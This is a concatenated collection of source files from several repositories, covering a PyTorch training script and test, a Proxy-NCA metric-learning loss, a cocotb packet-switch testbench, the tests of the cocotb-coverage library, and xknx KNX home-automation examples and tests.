train_loss.append(loss.item())
print("[%d] loss: %.3f" % (e + 1, running_loss / len(train_set)))
models_dir = to_absolute_path(cfg.paths["model_save"])
os.makedirs(models_dir, exist_ok=True)
torch.save(model, to_absolute_path(os.path.join(models_dir, "trained_model.pt")))
fig_dir = to_absolute_path(cfg.paths["figures"])
os.makedirs(fig_dir, exist_ok=True)
plt.plot(train_loss, label="Training loss")
plt.legend()
plt.xlabel("Epoch")
plt.ylabel("Loss")
plt.savefig(os.path.join(fig_dir, "loss.png"))
if __name__ == "__main__":
model = MyAwesomeModel()
hydra.core.global_hydra.GlobalHydra.instance().clear()
main()
```
#### File: jonpo_02476/tests/test_model.py
```python
import os
import unittest
import pytest
import torch
from torch.utils.data import DataLoader, TensorDataset
from src.models.model import MyAwesomeModel
from tests import _PATH_DATA
@pytest.mark.skipif(not os.path.exists(_PATH_DATA), reason="Data files not found")
class TestClass(unittest.TestCase):
# Load data
tr_images = torch.load(os.path.join(_PATH_DATA, "images_train.pt"))
tr_labels = torch.load(os.path.join(_PATH_DATA, "labels_train.pt"))
train_set = DataLoader(
TensorDataset(tr_images, tr_labels), batch_size=64, shuffle=True
)
model = MyAwesomeModel()
    orig_parameters = [p.detach().clone() for p in model.parameters()]
optimizer = torch.optim.Adam(model.parameters())
criterion = torch.nn.NLLLoss()
def test_optimization(self):
# We simply take one training step
for images, labels in self.train_set:
images = images.unsqueeze(1)
self.optimizer.zero_grad()
output = self.model(images)
loss = self.criterion(output, labels)
loss.backward()
self.optimizer.step()
            # the parameters were cloned before the step, so any difference
            # means the optimizer actually updated the model
            self.assertFalse(
                all(
                    torch.equal(orig, new)
                    for orig, new in zip(self.orig_parameters, self.model.parameters())
                ),
                "The model parameters are not being optimized",
            )
break
def test_error_on_wrong_shape(self):
with pytest.raises(ValueError, match="Expected input to a 4D tensor"):
self.model(torch.randn(1, 28, 28))
``` |
{
"source": "jonpoveda/proxy-nca",
"score": 2
} |
#### File: jonpoveda/proxy-nca/proxynca.py
```python
from similarity import pairwise_distance
import torch
import torch.nn.functional as F
def binarize_and_smooth_labels(T, nb_classes, smoothing_const = 0.1):
import sklearn.preprocessing
T = T.cpu().numpy()
T = sklearn.preprocessing.label_binarize(
T, classes = range(0, nb_classes)
)
T = T * (1 - smoothing_const)
T[T == 0] = smoothing_const / (nb_classes - 1)
T = torch.FloatTensor(T).cuda()
return T
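# example: with nb_classes = 4 and smoothing_const = 0.1, a label of 2 is
# binarized to [0, 0, 1, 0] and smoothed to roughly [0.033, 0.033, 0.9, 0.033]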
class ProxyNCAUnstable(torch.nn.Module):
def __init__(self, nb_classes, sz_embed, smoothing_const = 0.0,
exclude_positive = False):
torch.nn.Module.__init__(self)
self.proxies = torch.nn.Parameter(torch.randn(nb_classes, sz_embed) / 8)
self.exclude_positive = exclude_positive
self.smoothing_const = smoothing_const
def forward_single(self, X, T, i):
P = self.proxies
nb_classes = len(P)
sz_batch = len(X)
P = 3 * F.normalize(P, p = 2, dim = -1)
X = 3 * F.normalize(X, p = 2, dim = -1)
y_label = T[i].long().cuda()
Z_labels = torch.arange(nb_classes).long().cuda()
if self.exclude_positive:
# all classes/proxies except of t
Z_labels = Z_labels[Z_labels != y_label].long()
assert Z_labels.size(0) == nb_classes - 1
# necessary to calc distances for label smoothing
        # if label smoothing omitted, one can simply use p_dist = D[i][y_label]
D = pairwise_distance(
torch.cat(
[X, P]
),
squared = True
)[:X.size()[0], X.size()[0]:]
# use all positives, for probabilities, else p_dist = D[i][y_label]
p_dist = D[i]
n_dist = D[i][Z_labels]
return torch.log(torch.exp(p_dist) / torch.sum(torch.exp(n_dist)))
def forward(self, X, T):
# log with exp results in unstable calculations, could use max to fix it
out = torch.stack(
[self.forward_single(X, T, i) for i in range(len(X))]
)
T = binarize_and_smooth_labels(
T = T,
nb_classes = len(self.proxies),
smoothing_const = self.smoothing_const
)
# if D not calculated (pdist), then smoothing only for positive possible
loss = (- T * out).sum(-1).mean()
return loss
class ProxyNCA(torch.nn.Module):
def __init__(self, nb_classes, sz_embed, smoothing_const = 0.0, **kwargs):
torch.nn.Module.__init__(self)
self.proxies = torch.nn.Parameter(torch.randn(nb_classes, sz_embed) / 8)
self.smoothing_const = smoothing_const
def forward(self, X, T):
P = self.proxies
P = 3 * F.normalize(P, p = 2, dim = -1)
X = 3 * F.normalize(X, p = 2, dim = -1)
D = pairwise_distance(
torch.cat(
[X, P]
),
squared = True
)[:X.size()[0], X.size()[0]:]
T = binarize_and_smooth_labels(
T = T, nb_classes = len(P), smoothing_const = self.smoothing_const
)
# cross entropy with distances as logits, one hot labels
# note that compared to proxy nca, positive not excluded in denominator
loss = torch.sum(- T * F.log_softmax(D, -1), -1)
return loss.mean()
if __name__ == '__main__':
import random
nb_classes = 100
sz_batch = 32
sz_embed = 64
X = torch.randn(sz_batch, sz_embed).cuda()
P = torch.randn(nb_classes, sz_embed).cuda()
T = torch.arange(
0, nb_classes
).repeat(sz_batch)[torch.randperm(nb_classes * sz_batch)[:sz_batch]].cuda()
pnca = ProxyNCA(nb_classes, sz_embed).cuda()
pnca_unst = ProxyNCAUnstable(
nb_classes, sz_embed, exclude_positive= False
).cuda()
pnca_unst.proxies.data = pnca.proxies.data.clone()
print(pnca(X, T.view(sz_batch)))
print(pnca_unst(X, T.view(sz_batch, 1)))
``` |
{
"source": "jonpovey/cocotb-coverage",
"score": 2
} |
#### File: pkt_switch/tests/test_pkt_switch.py
```python
import cocotb
from cocotb.triggers import Timer, RisingEdge, ReadOnly
from cocotb.drivers import BusDriver
from cocotb.monitors import BusMonitor
from cocotb_coverage.coverage import *
from cocotb_coverage.crv import *
import numpy as np
class Packet(Randomized):
def __init__(self, data = [0, 3, 0]):
Randomized.__init__(self)
self.addr = data[0]
self.len = len(data)
self.payload = data[2:]
self.add_rand("addr", list(range(256)))
self.add_rand("len", list(range(3,32)))
def post_randomize(self):
self.payload = [np.random.randint(256) for _ in range(self.len-2)]
class PacketIFDriver(BusDriver):
'''
Packet Interface Driver
'''
_signals = ["data", "valid"]
def __init__(self, entity, name, clock):
BusDriver.__init__(self, entity, name, clock)
self.clock = clock
self.bus.data.setimmediatevalue(0)
self.bus.valid.setimmediatevalue(0)
@cocotb.coroutine
def send(self, packet):
self.bus.valid <= 1
# transmit header
self.bus.data <= packet.addr
yield RisingEdge(self.clock)
self.bus.data <= packet.len
yield RisingEdge(self.clock)
for byte in packet.payload:
self.bus.data <= byte
yield RisingEdge(self.clock)
self.bus.valid <= 0
yield RisingEdge(self.clock)
class PacketIFMonitor(BusMonitor):
'''
Packet Interface Monitor
'''
_signals = ["data", "valid"]
def __init__(self, entity, name, clock):
BusMonitor.__init__(self, entity, name, clock)
self.clock = clock
@cocotb.coroutine
def _monitor_recv(self):
pkt_receiving = False
received_data = []
while True:
yield RisingEdge(self.clock)
yield ReadOnly()
if (self.bus.valid == 1):
pkt_receiving = True
received_data.append(int(self.bus.data))
elif pkt_receiving and (self.bus.valid == 0): # packet ended
pkt = Packet(received_data)
self._recv(pkt)
pkt_receiving = False
received_data = []
# simple clock generator
@cocotb.coroutine
def clock_gen(signal, period=10000):
while True:
signal <= 0
yield Timer(period/2)
signal <= 1
yield Timer(period/2)
@cocotb.test()
def pkt_switch_test(dut):
""" PKT_SWITCH Test """
log = cocotb.logging.getLogger("cocotb.test") # logger instance
cocotb.fork(clock_gen(dut.clk, period=100)) # start clock running
# reset & init
dut.rst_n <= 1
dut.datain_data <= 0
dut.datain_valid <= 0
dut.ctrl_addr <= 0
dut.ctrl_data <= 0
dut.ctrl_wr <= 0
yield Timer(1000)
dut.rst_n <= 0
yield Timer(1000)
dut.rst_n <= 1
# procedure of writing configuration registers
@cocotb.coroutine
def write_config(addr, data):
for [a, d] in zip(addr, data):
dut.ctrl_addr <= a
dut.ctrl_data <= d
dut.ctrl_wr <= 1
yield RisingEdge(dut.clk)
dut.ctrl_wr <= 0
enable_transmit_both = lambda: write_config([0], [4])
disable_filtering = lambda: write_config([0], [0])
@cocotb.coroutine
def enable_addr_filtering(addr, mask):
yield write_config([0, 2, 3], [1, addr, mask])
@cocotb.coroutine
def enable_len_filtering(low_limit, up_limit):
yield write_config([0, 4, 5], [2, low_limit, up_limit])
driver = PacketIFDriver(dut, name="datain", clock=dut.clk)
monitor0 = PacketIFMonitor(dut, name="dataout0", clock=dut.clk)
monitor1 = PacketIFMonitor(dut, name="dataout1", clock=dut.clk)
expected_data0 = [] # queue of expeced packet at interface 0
expected_data1 = [] # queue of expeced packet at interface 1
def scoreboarding(pkt, queue_expected):
assert pkt.addr == queue_expected[0].addr
assert pkt.len == queue_expected[0].len
assert pkt.payload == queue_expected[0].payload
queue_expected.pop()
monitor0.add_callback(lambda _ : scoreboarding(_, expected_data0))
monitor1.add_callback(lambda _ : scoreboarding(_, expected_data1))
monitor0.add_callback(lambda _ : log.info("Receiving packet on interface 0 (packet not filtered)"))
monitor1.add_callback(lambda _ : log.info("Receiving packet on interface 1 (packet filtered)"))
# functional coverage - check received packet
@CoverPoint(
"top.packet_length",
xf = lambda pkt, event, addr, mask, ll, ul: pkt.len, # packet length
bins = list(range(3,32)) # may be 3 ... 31 bytes
)
@CoverPoint("top.event", vname="event", bins = ["DIS", "TB", "AF", "LF"])
@CoverPoint(
"top.filt_addr",
xf = lambda pkt, event, addr, mask, ll, ul: # filtering based on particular bits in header
(addr & mask & 0x0F) if event == "AF" else None, # check only if event is "address filtering"
bins = list(range(16)), # check only 4 LSBs if all options tested
)
@CoverPoint(
"top.filt_len_eq",
xf = lambda pkt, event, addr, mask, ll, ul: ll == ul, # filtering of a single packet length
bins = [True, False]
)
@CoverPoint(
"top.filt_len_ll",
vname = "ll", # lower limit of packet length
bins = list(range(3,32)) # 3 ... 31
)
@CoverPoint(
"top.filt_len_ul",
vname = "ul", # upper limit of packet length
bins = list(range(3,32)) # 3 ... 31
)
@CoverCross(
"top.filt_len_ll_x_packet_length",
items = ["top.packet_length", "top.filt_len_ll"]
)
@CoverCross(
"top.filt_len_ul_x_packet_length",
items = ["top.packet_length", "top.filt_len_ul"]
)
def log_sequence(pkt, event, addr, mask, ll, ul):
log.info("Processing packet:")
log.info(" ADDRESS: %X", pkt.addr)
log.info(" LENGTH: %d", pkt.len)
log.info(" PAYLOAD: " + str(pkt.payload))
if event is "DIS":
log.info("Filtering disabled")
elif event is "TB":
log.info("Transmit on both interfaces")
elif event is "AF":
log.info("Address filtering, address: %02X, mask: %02X", addr, mask)
elif event is "LF":
log.info("Length filtering, lower limit: %d, upper limit: %d", ll, ul)
# main loop
for _ in range(1000): # is that enough repetitions to ensure coverage goal? Check out!
event = np.random.choice(["DIS", "TB", "AF", "LF"])
# DIS - disable filtering : expect all packets on interface 0
# TB - transmit bot : expect all packets on interface 0 and 1
# AF - address filtering : expect filtered packets on interface 1, others on 0
# LF - length filtering : expect filtered packets on interface 1, others on 0
# randomize test data
        pkt = Packet()
pkt.randomize()
addr = np.random.randint(256) # 0x00 .. 0xFF
mask = np.random.randint(256) # 0x00 .. 0xFF
low_limit = np.random.randint(3,32) # 3 ... 31
up_limit = np.random.randint(low_limit,32) # low_limit ... 31
# expect the packet on the particular interface
if event == "DIS":
yield disable_filtering()
expected_data0.append(pkt)
elif event == "TB":
yield enable_transmit_both()
expected_data0.append(pkt)
expected_data1.append(pkt)
elif event == "AF":
yield enable_addr_filtering(addr, mask)
if ((pkt.addr & mask) == (addr & mask)):
expected_data1.append(pkt)
else:
expected_data0.append(pkt)
elif event == "LF":
yield enable_len_filtering(low_limit, up_limit)
if (low_limit <= pkt.len <= up_limit):
expected_data1.append(pkt)
else:
expected_data0.append(pkt)
# wait DUT
yield driver.send(pkt)
yield RisingEdge(dut.clk)
yield RisingEdge(dut.clk)
# LOG the action
log_sequence(pkt, event, addr, mask, low_limit, up_limit)
# print coverage report
coverage_db.report_coverage(log.info, bins=False)
# export
coverage_db.export_to_xml(filename="coverage_pkt_switch.xml")
coverage_db.export_to_yaml(filename="coverage_pkt_switch.yml")
```
#### File: tests/test_coverage/coverage_test.py
```python
from cocotb_coverage import coverage
import pytest
import random
#simple coverpoint
def test_simple_coverpoint():
print("Running test_simple_coverpoint")
for i in range(10):
x = random.randint(0,10)
@coverage.CoverPoint("top.t1.c1", vname="i", bins = list(range(10)))
@coverage.CoverPoint("top.t1.c2", vname="x", bins = list(range(10)))
def sample(i, x):
pass
sample(i, x)
#check coverage size
assert coverage.coverage_db["top.t1.c1"].size == 10
#expect all covered
assert coverage.coverage_db["top.t1.c1"].coverage == 10
#expect 100%
assert coverage.coverage_db["top.t1.c1"].cover_percentage == 100
#expect something covered
assert 0 < coverage.coverage_db["top.t1.c2"].coverage < 10
#expect each bin hit only once
for i in range(10):
assert coverage.coverage_db["top.t1.c1"].detailed_coverage[i] == 1
#coverage.coverage_db.report_coverage(print, bins=False)
class FooBar():
def __init__(self):
pass
@coverage.CoverPoint("top.t2.in_class", bins = ["foo", "bar"])
def cover(self, something):
pass
#coverpoint in class
def test_coverpoint_in_class():
print("Running test_coverpoint_in_class")
fb = FooBar()
assert coverage.coverage_db["top.t2.in_class"].size == 2
assert coverage.coverage_db["top.t2.in_class"].coverage == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 0
fb.cover("bar")
assert coverage.coverage_db["top.t2.in_class"].coverage == 1
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 1
fb.cover("bar")
assert coverage.coverage_db["top.t2.in_class"].coverage == 1
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 0
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 2
fb.cover("foo")
assert coverage.coverage_db["top.t2.in_class"].coverage == 2
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["foo"] == 1
assert coverage.coverage_db["top.t2.in_class"].detailed_coverage["bar"] == 2
#injective coverpoint - matching multiple bins at once
def test_injective_coverpoint():
print("Running test_injective_coverpoint")
def is_divider(number, divider):
return number % divider == 0
@coverage.CoverPoint("top.t3.inj", rel = is_divider, bins = [1, 2, 3, 5, 7, 11, 13, 17], inj = False)
def sample(x):
pass
assert coverage.coverage_db["top.t3.inj"].size == 8
assert coverage.coverage_db["top.t3.inj"].coverage == 0
sample(17) #covers 1 and 17
assert coverage.coverage_db["top.t3.inj"].coverage == 2
sample(30) #covers 2,3 and 5
assert coverage.coverage_db["top.t3.inj"].coverage == 5
sample(77) #covers 7 and 11
assert coverage.coverage_db["top.t3.inj"].coverage == 7
#cross
def test_covercross():
print("Running test_covercross")
for i in range(10):
@coverage.CoverPoint("top.t4.c1", vname="x1", bins = list(range(10)))
@coverage.CoverPoint("top.t4.c2", xf = lambda x1, x2, x3 : x2 ** (0.5), bins = list(range(10)))
@coverage.CoverPoint("top.t4.c3", xf = lambda x1, x2, x3 : x1 + x2 + x3, bins = list(range(10)))
@coverage.CoverCross("top.t4.cross1", items = ["top.t4.c1","top.t4.c2","top.t4.c3"])
@coverage.CoverCross("top.t4.cross2", items = ["top.t4.c1","top.t4.c2"],
ign_bins = [(None, 1), (2,2), (4, 5)] #ignored any c1 if c2=1, pair of (2,2) and (4,5)
)
@coverage.CoverCross("top.t4.cross3", items = ["top.t4.c1","top.t4.c2"],
ign_bins = [(ii, ii) for ii in range(10)] #ignore all pairs of the same numbers
)
def sample(x1, x2, x3):
pass
sample(i, i**2, -i)
#We expect c1 and c2 covered in all range, c3 covered bins: 0, 1, 4, 9
assert coverage.coverage_db["top.t4.c1"].coverage == 10
assert coverage.coverage_db["top.t4.c2"].coverage == 10
assert coverage.coverage_db["top.t4.c3"].coverage == 4
#cross1 size is 1000 (10x10x10), but covered only 4 bins (note out of range)
assert coverage.coverage_db["top.t4.cross1"].size == 1000
assert coverage.coverage_db["top.t4.cross1"].coverage == 4
#cross2 size is 100 (10x10) minus 12 = 88
assert coverage.coverage_db["top.t4.cross2"].size == 88
assert coverage.coverage_db["top.t4.cross2"].coverage == 8
#cross3 size is 100 (10x10) minus 10 = 90
assert coverage.coverage_db["top.t4.cross3"].size == 90
assert coverage.coverage_db["top.t4.cross3"].coverage == 0 #expect nothing covered
#test at least and weight
def test_at_least_and_weight():
print("Running test_at_least_and_weight")
@coverage.CoverPoint("top.t5.c1", vname="i", bins = list(range(10)), weight = 100)
@coverage.CoverPoint("top.t5.c2", xf = lambda i, x : i % 6, bins = list(range(5)), at_least = 2)
@coverage.CoverPoint("top.t5.c3", vname="x", bins = list(range(10)), at_least = 2)
@coverage.CoverCross("top.t5.cross", items = ["top.t5.c1","top.t5.c2"], at_least = 2)
def sample(i, x):
pass
for i in range(10):
x = random.randint(0,5)
sample(i, x)
#expect all covered, but weight is * 100
assert coverage.coverage_db["top.t5.c1"].size == 1000
assert coverage.coverage_db["top.t5.c1"].coverage == 1000
#in c2 expect covered only at least 2 times, so 4 in total
assert coverage.coverage_db["top.t5.c2"].coverage == 4
#expect something covered in c3
assert 0 < coverage.coverage_db["top.t5.c3"].coverage < 10
assert coverage.coverage_db["top.t5.cross"].size == 50
assert coverage.coverage_db["top.t5.cross"].coverage == 0
sample(0, 0) #sample one more time to make sure cross satisfies "at_least" condition
assert coverage.coverage_db["top.t5.cross"].coverage == 1
#test callbacks
def test_callbacks():
print("Running test_callbacks")
current_step = 0
cb1_fired = [False]
cb2_fired = [False]
cb3_fired = [False]
def bins_callback_1():
cb1_fired[0] = True
print("Bins callback 1 fired at step %d" % current_step)
assert current_step == 3 or current_step == 53
def threshold_callback_2():
cb2_fired[0] = True
print("top.threshold callback 2 fired at step %d" % current_step)
assert current_step == 49
def threshold_callback_3():
cb3_fired[0] = True
print("top.threshold callback 3 fired at step %d" % current_step)
assert current_step == 29
@coverage.CoverPoint("top.t6.c1", bins = list(range(100)))
@coverage.CoverPoint("top.t6.c2", xf = lambda i : i % 50, bins = list(range(50)))
def sample(i):
pass
coverage.coverage_db["top.t6.c1"].add_threshold_callback(threshold_callback_2,50)
coverage.coverage_db["top.t6"].add_threshold_callback(threshold_callback_3,40)
coverage.coverage_db["top.t6.c2"].add_bins_callback(bins_callback_1,3)
for i in range(100):
sample(i)
current_step += 1
assert cb1_fired[0]
assert cb2_fired[0]
assert cb3_fired[0]
#test xml export
def test_xml_export():
import os.path
from xml.etree import ElementTree as et
import yaml
print("Running test_xml_export")
#test CoverCheck
@coverage.CoverCheck(name = "top.t7.failed_check",
f_fail = lambda i : i == 0,
f_pass = lambda i : i > 5)
@coverage.CoverCheck(name = "top.t7.passing_check",
f_fail = lambda i : i > 100,
f_pass = lambda i : i < 50)
def sample(i):
pass
for i in range(50):
sample(i)
#coverage.coverage_db.report_coverage(print, bins=False)
# Export coverage to XML, check if file exists
xml_filename = 'test_xml_export_output.xml'
yml_filename = 'test_yaml_export_output.yml'
coverage.coverage_db.export_to_xml(filename='test_xml_export_output.xml')
coverage.coverage_db.export_to_yaml(filename='test_yaml_export_output.yml')
assert os.path.isfile(xml_filename)
assert os.path.isfile(yml_filename)
# Read back the XML
xml_db = et.parse(xml_filename).getroot()
# dict - child: [all parents for that name]
child_parent_dict = {}
for p in xml_db.iter():
for c in p:
if 'bin' not in c.tag:
if c.tag not in child_parent_dict.keys():
child_parent_dict[c.tag] = [p.tag]
else:
child_parent_dict[c.tag].append(p.tag)
# Check if coverage_db items are XML, with proper parents
for item in coverage.coverage_db:
if '.' in item:
item_elements = item.split('.')
assert 'top' in child_parent_dict[item_elements[1]]
for elem_parent, elem in zip(item_elements, item_elements[1:]):
assert elem_parent in child_parent_dict[elem]
# Check YML
with open(yml_filename, 'r') as fp:
yml_db = yaml.safe_load(fp)
for item in yml_db:
if isinstance(coverage.coverage_db[item], coverage.CoverPoint):
#assert if correct coverage levels
assert yml_db[item]['coverage'] == coverage.coverage_db[item].coverage
# check if yaml and coverage databases have equal size
assert len(yml_db) == len(coverage.coverage_db)
# test xml/yaml merge - static example covering
# adding new elements and updating existing
def test_xml_merge():
import os.path
from xml.etree import ElementTree as et
print("Running test_xml_merge")
filename = 'test_xml_merge_output.xml'
coverage.merge_coverage(print, filename, 'cov_short1_input.xml', 'cov_short2_input.xml', 'cov_short3_input.xml')
assert os.path.isfile(filename)
# Read back the XML
xml_db = et.parse(filename).getroot()
assert xml_db.tag == 'top'
assert xml_db.attrib['coverage'] == '102'
assert xml_db.attrib['size'] == '104'
def test_yaml_merge():
import os.path
import yaml
print("Running test_yaml_merge")
filename = 'test_yaml_merge_output.yml'
coverage.merge_coverage(print, filename, 'coverage1_input.yml', 'coverage2_input.yml',
'coverage3_input.yml')
assert os.path.isfile(filename)
#Read back the XML
with open(filename, 'r') as stream:
try:
yaml_parsed = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
assert yaml_parsed['top']['coverage'] == 52
assert yaml_parsed['top']['size'] == 122
assert 'top.coveritemm.signall.cp10' in list(yaml_parsed.keys())
#test covercheck
def test_covercheck():
print("Running test_covercheck")
@coverage.CoverCheck("top.t8.check", f_pass = lambda x : x > 0, f_fail = lambda x : x < 0, at_least = 2)
def sample(x):
pass
assert coverage.coverage_db["top.t8.check"].size == 1
assert coverage.coverage_db["top.t8.check"].coverage == 0
sample(0)
sample(1)
assert coverage.coverage_db["top.t8.check"].coverage == 0 #should not be covered yet
sample(5)
assert coverage.coverage_db["top.t8.check"].coverage == 1 #should be covered now
sample(-1)
assert coverage.coverage_db["top.t8.check"].coverage == 0 #should be fixed 0 now forever
sample(4)
sample(3)
sample(1)
assert coverage.coverage_db["top.t8.check"].coverage == 0
sample(-1)
assert coverage.coverage_db["top.t8.check"].coverage == 0
def test_print_coverage():
print("Running test_print_coverage")
@coverage.CoverPoint("top.t9.c1", bins=[1,2,3])
def sample(i):
pass
print_ = []
def logger(_):
print_.append(_)
coverage.coverage_db.report_coverage(logger, bins=True, node="top.t9")
#check if only t9 printed
#print(print_)
assert print_[0].strip().startswith("top.t9")
def test_bins_labels():
print("Running test_bins_labels")
@coverage.CoverPoint("top.t10.c1", xf = lambda i,j : (i , i), bins_labels = ["a", "b"], bins=[(1,1), (2,2)])
@coverage.CoverPoint("top.t10.c2", vname="j", bins_labels = ["c", "d"], bins=[3,4])
@coverage.CoverCross("top.t10.cross", items=["top.t10.c1", "top.t10.c2"])
def sample(i,j):
pass
assert coverage.coverage_db["top.t10.cross"].size == 4
sample(1,1)
assert coverage.coverage_db["top.t10.cross"].coverage == 0
sample(1,3)
assert coverage.coverage_db["top.t10.cross"].coverage == 1
sample(1,4)
assert coverage.coverage_db["top.t10.cross"].coverage == 2
sample(2,4)
assert coverage.coverage_db["top.t10.cross"].coverage == 3
sample(2,3)
assert coverage.coverage_db["top.t10.cross"].coverage == 4
``` |
{
"source": "jonppe/xknx",
"score": 3
} |
#### File: xknx/examples/example_config.py
```python
import asyncio
from xknx import XKNX
async def main():
"""Read xknx.yaml, walk through all devices and print them."""
xknx = XKNX(config="xknx.yaml")
for device in xknx.devices:
print(device)
asyncio.run(main())
```
#### File: xknx/examples/example_daemon.py
```python
import asyncio
from xknx import XKNX
from xknx.devices import Switch
async def device_updated_cb(device):
"""Do something with the updated device."""
print(f"Callback received from {device.name}")
async def main():
"""Connect to KNX/IP device and listen if a switch was updated via KNX bus."""
xknx = XKNX(device_updated_cb=device_updated_cb, daemon_mode=True)
Switch(xknx, name="TestOutlet", group_address="1/1/11")
# Wait until Ctrl-C was pressed
await xknx.start()
await xknx.stop()
asyncio.run(main())
```
#### File: test/remote_value_tests/remote_value_switch_test.py
```python
import asyncio
import unittest
from xknx import XKNX
from xknx.dpt import DPTArray, DPTBinary
from xknx.exceptions import ConversionError, CouldNotParseTelegram
from xknx.remote_value import RemoteValueSwitch
from xknx.telegram import GroupAddress, Telegram
class TestRemoteValueSwitch(unittest.TestCase):
"""Test class for RemoteValueSwitch objects."""
def setUp(self):
"""Set up test class."""
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
"""Tear down test class."""
self.loop.close()
def test_to_knx(self):
"""Test to_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx)
self.assertEqual(remote_value.to_knx(True), DPTBinary(True))
self.assertEqual(remote_value.to_knx(False), DPTBinary(False))
def test_from_knx(self):
"""Test from_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx)
self.assertEqual(remote_value.from_knx(DPTBinary(True)), True)
self.assertEqual(remote_value.from_knx(DPTBinary(0)), False)
def test_to_knx_invert(self):
"""Test to_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, invert=True)
self.assertEqual(remote_value.to_knx(True), DPTBinary(0))
self.assertEqual(remote_value.to_knx(False), DPTBinary(1))
def test_from_knx_invert(self):
"""Test from_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, invert=True)
self.assertEqual(remote_value.from_knx(DPTBinary(1)), False)
self.assertEqual(remote_value.from_knx(DPTBinary(0)), True)
def test_to_knx_error(self):
"""Test to_knx function with wrong parametern."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx)
with self.assertRaises(ConversionError):
remote_value.to_knx(1)
def test_set(self):
"""Test setting value."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
self.loop.run_until_complete(remote_value.on())
self.assertEqual(xknx.telegrams.qsize(), 1)
telegram = xknx.telegrams.get_nowait()
self.assertEqual(
telegram, Telegram(GroupAddress("1/2/3"), payload=DPTBinary(1))
)
self.loop.run_until_complete(remote_value.off())
self.assertEqual(xknx.telegrams.qsize(), 1)
telegram = xknx.telegrams.get_nowait()
self.assertEqual(
telegram, Telegram(GroupAddress("1/2/3"), payload=DPTBinary(0))
)
def test_process(self):
"""Test process telegram."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
telegram = Telegram(group_address=GroupAddress("1/2/3"), payload=DPTBinary(1))
self.assertEqual(remote_value.value, None)
self.loop.run_until_complete(remote_value.process(telegram))
self.assertIsNotNone(remote_value.payload)
self.assertEqual(remote_value.value, True)
def test_process_off(self):
"""Test process OFF telegram."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
telegram = Telegram(group_address=GroupAddress("1/2/3"), payload=DPTBinary(0))
self.assertEqual(remote_value.value, None)
self.loop.run_until_complete(remote_value.process(telegram))
self.assertIsNotNone(remote_value.payload)
self.assertEqual(remote_value.value, False)
def test_to_process_error(self):
"""Test process errornous telegram."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
with self.assertRaises(CouldNotParseTelegram):
telegram = Telegram(
group_address=GroupAddress("1/2/3"), payload=DPTArray(0x01)
)
self.loop.run_until_complete(remote_value.process(telegram))
with self.assertRaises(CouldNotParseTelegram):
telegram = Telegram(
group_address=GroupAddress("1/2/3"), payload=DPTBinary(3)
)
self.loop.run_until_complete(remote_value.process(telegram))
# pylint: disable=pointless-statement
remote_value.value
```
#### File: xknx/remote_value/remote_value_color_rgbw.py
```python
from xknx.dpt import DPTArray
from xknx.exceptions import ConversionError
from .remote_value import RemoteValue
class RemoteValueColorRGBW(RemoteValue):
"""Abstraction for remote value of KNX DPT 251.600 (DPT_Color_RGBW)."""
def __init__(
self,
xknx,
group_address=None,
group_address_state=None,
device_name=None,
feature_name="Color RGBW",
after_update_cb=None,
):
"""Initialize remote value of KNX DPT 251.600 (DPT_Color_RGBW)."""
# pylint: disable=too-many-arguments
super().__init__(
xknx,
group_address,
group_address_state,
device_name=device_name,
feature_name=feature_name,
after_update_cb=after_update_cb,
)
self.previous_value = (0, 0, 0, 0)
def payload_valid(self, payload):
"""Test if telegram payload may be parsed."""
return isinstance(payload, DPTArray) and len(payload.value) == 6
def to_knx(self, value):
"""
Convert value (4-6 bytes) to payload (6 bytes).
* Structure of DPT 251.600
** Byte 0: R value
** Byte 1: G value
** Byte 2: B value
** Byte 3: W value
** Byte 4: 0x00 (reserved)
** Byte 5:
*** Bit 0: W value valid?
*** Bit 1: B value valid?
*** Bit 2: G value valid?
*** Bit 3: R value valid?
*** Bit 4-7: 0
In case we receive
* > 6 bytes: error
* 6 bytes: all bytes are passed through
* 5 bytes: 0x00?? fill up to 6 bytes
* 4 bytes: 0x000f right padding to 6 bytes
* < 4 bytes: error
"""
if not isinstance(value, (list, tuple)):
raise ConversionError(
"Could not serialize RemoteValueColorRGBW (wrong type, expecting list of 4-6 bytes))",
value=value,
type=type(value),
)
if len(value) < 4 or len(value) > 6:
raise ConversionError(
"Could not serialize value to DPT 251.600 (wrong length, expecting list of 4-6 bytes)",
value=value,
type=type(value),
)
rgbw = value[:4]
if (
any(not isinstance(color, int) for color in rgbw)
or any(color < 0 for color in rgbw)
or any(color > 255 for color in rgbw)
):
raise ConversionError(
"Could not serialize DPT 251.600 (wrong RGBW values)", value=value
)
if len(value) < 5:
return DPTArray(list(rgbw) + [0x00, 0x0F])
if len(value) < 6:
return DPTArray(list(rgbw) + [0x00] + list(value[4:]))
return DPTArray(value)
def from_knx(self, payload):
"""
Convert current payload to value. Always 4 byte (RGBW).
If one element is invalid, use the previous value. All previous element
values are initialized to 0.
"""
result = []
for i in range(0, len(payload.value) - 2):
valid = (payload.value[5] & (0x08 >> i)) != 0 # R,G,B,W value valid?
result.append(payload.value[i] if valid else self.previous_value[i])
self.previous_value = result
return result
``` |
{
"source": "jonpspri/bazel",
"score": 2
} |
#### File: tools/cpp/windows_cc_configure.bzl
```python
load(
"@bazel_tools//tools/cpp:lib_cc_configure.bzl",
"auto_configure_fail",
